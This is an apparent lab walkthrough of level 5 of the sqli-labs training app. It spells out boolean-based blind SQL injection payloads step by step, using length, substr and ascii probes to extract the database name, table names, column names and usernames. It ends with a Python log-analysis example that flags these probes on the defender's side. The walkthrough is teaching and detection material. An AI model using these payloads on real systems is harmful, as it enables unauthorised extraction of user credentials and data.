sqli-labs less-5
Level 5 differs from the previous levels.
* Confirming the injection point
Entering ?id=1 echoes the message "You are in......".
Determining the injection type:
Entering ?id=1'
From the error message we can tell that the injection is string-based.
Entering ?id=1' --+ the page displays normally.
From this, the closing sequence is ')
* Determining the number of columns
Entering ?id=1') order by 3 --+ the page displays normally.
Entering ?id=1') order by 4 --+ the page reports an error.
So the field count is 3: the query returns 3 columns.
* Extracting detailed information
Because this level's page does not echo query results, a UNION query cannot be used; and because there is no error message, error-based injection cannot be used either.
So this level uses boolean-based blind injection.
Boolean blind injection generally applies when the page has no echoed field (so UNION queries are not supported) and the web page only returns true or false. We construct SQL statements and use keywords such as and/or so that the expression following them evaluates to true or false; the web page then returns true or false accordingly, which achieves the injection goal of extracting information.
The boolean blind injection workflow:
- Finding the length of the current database name
Use the length function.
Enter ?id=1') and length(database())=1 --+
This tests whether the database name has length 1.
The page shows nothing, so the length is not 1. We try values from 1 upward; at 8 the page displays normally.
So the database name has length 8.
- Finding the current database name
The substr function can be used for the blind probe.
Enter ?id=1' and (substr(database(),1,1)='s') --+
(the first argument is the input string, the second is the position to take, and the third is the step)
The page displays normally, so the first letter of the database name is s. In the same way we try the following URLs:
?id=1' and (substr(database(),2,1)='e') --+
?id=1' and (substr(database(),3,1)='c') --+
?id=1' and (substr(database(),4,1)='u') --+
?id=1' and (substr(database(),5,1)='r') --+
?id=1' and (substr(database(),6,1)='i') --+
?id=1' and (substr(database(),7,1)='t') --+
?id=1' and (substr(database(),8,1)='y') --+
There are only a few common database names, so once the length is known the name can usually be guessed.
So the database name is 'security'.
- Finding the number of tables in the current database
Entering ?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=3 --+ reports an error.
Entering ?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4 --+ displays normally.
Entering ?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=5 --+ reports an error.
So there are 4 tables.
- Finding the table names
Direct guessing works:
Enter ?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 0,1)='emails' --+
?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 1,1)='referers' --+
?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 2,1)='uagents' --+
?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 3,1)='users' --+
Alternatively, first find the length of the table name:
Entering ?id=1' and (length((select table_name from information_schema.tables where table_schema = database() limit 0,1))) = 6 --+ displays normally (or: ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),6,1)) --+ displays normally)
Then guess the table name character by character with the ASCII function:
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))=101 --+ -> e
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),2,1))=109 --+ -> m
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),3,1))=97 --+ -> a
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),4,1))=105 --+ -> i
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),5,1))=108 --+ -> l
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),6,1))=115 --+ -> s
So the table name is emails.
- Finding the number of columns in a table
Entering ?id=1' and (select count(column_name) from information_schema.columns where table_name ='users') = 3 --+ displays normally.
- Finding the length of a column name
Entering ?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 0,1),2,1)) --+ displays normally.
- Finding the column names
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 0,1),1,1)) = 105 --+ -> i
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 0,1),2,1)) = 100 --+ -> d
Column 1: id
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 1,1),1,1)) = 117 --+ -> u
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 1,1),2,1)) = 115 --+ -> s
...
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 1,1),7,1)) = 109 --+ -> m
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 1,1),8,1)) = 101 --+ -> e
Column 2: username
In the same way, column 3 is found to be: password
- Finding the number of entries in a field of the table
?id=1' and (select count(username) from users) = 13 --+ displays normally
- Finding the length of a field value
?id=1' and ascii(substr((select username from users limit 0,1),4,1)) --+ displays normally
- Finding the field contents
?id=1' and ascii(substr((select username from users limit 0,1),1,1)) = 68 --+ -> d
?id=1' and ascii(substr((select username from users limit 0,1),2,1)) = 117 --+ -> u
?id=1' and ascii(substr((select username from users limit 0,1),3,1)) = 109 --+ -> m
?id=1' and ascii(substr((select username from users limit 0,1),4,1)) = 98 --+ -> b
Done.
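The probe sequence above, seen from the defender's side: an added example (not part of the original write-up) that scans constructed Apache-style access-log lines for the hallmarks of this walkthrough (the quote break-out, `order by N`, `and length(...)`/`substr(...)` probes with a comment tail) and groups them by client and normalised template, so the one-guess-per-request rhythm of a blind extraction stands out. The log lines, client addresses and signature names are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed sample access-log lines (not real traffic): the probe sequence from
# this write-up as a web server would record it, plus one benign request.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-5/?id=1%27 HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-5/?id=1%27%20order%20by%203%20--+ HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-5/?id=1%27%20and%20length(database())=1%20--+ HTTP/1.1" 200 300
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-5/?id=1%27%20and%20length(database())=8%20--+ HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /Less-5/?id=1%27%20and%20(substr(database(),1,1)=%27s%27)%20--+ HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:07 +0000] "GET /Less-5/?id=1%27%20and%20(substr(database(),2,1)=%27e%27)%20--+ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:08 +0000] "GET /Less-5/?id=2 HTTP/1.1" 200 512
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*"')
# Each pattern matches one step of the walkthrough, applied to a decoded parameter value.
SIGNATURES = {
    "bool_probe":   re.compile(r"\b(and|or)\b[\s(]*(length|substr|substring|mid|ascii)\s*\(", re.I),
    "schema_read":  re.compile(r"information_schema\.", re.I),
    "column_count": re.compile(r"\border\s+by\s+\d+", re.I),
    "comment_tail": re.compile(r"(--|#)\s*$"),
}

def signatures(value):
    """Signature names a decoded value triggers; an odd quote count marks a string break-out."""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    if value.count("'") % 2 == 1:
        hits.append("unbalanced_quote")
    return sorted(hits)

def template(value):
    """Normalise a value so probes that differ only in the guessed literal collide."""
    v = re.sub(r"=\s*'[^']*'", "='?'", value.lower())  # quoted guess -> '?'
    v = re.sub(r"\d+", "N", v)                          # numeric guess -> N
    return re.sub(r"\s+", " ", v).strip()

def analyse(log_text):
    """Group flagged requests per (client, parameter, template); the repeat count is the tell."""
    counts, hits = Counter(), {}
    for line in log_text.splitlines():
        if not (m := LOG_RE.match(line)):
            continue
        for name, value in parse_qsl(m["path"].partition("?")[2], keep_blank_values=True):
            sigs = signatures(value)
            if sigs:
                key = (m["ip"], name, template(value))
                counts[key] += 1
                hits.setdefault(key, set()).update(sigs)
    return {k: {"count": n, "signatures": sorted(hits[k])} for k, n in counts.items()}
```

On the sample, analyse(SAMPLE_LOG) returns four entries for 10.0.0.7: the two length() probes and the two substr() probes each collapse to one template with count 2, while the plain ?id=2 request from 10.0.0.9 is not flagged.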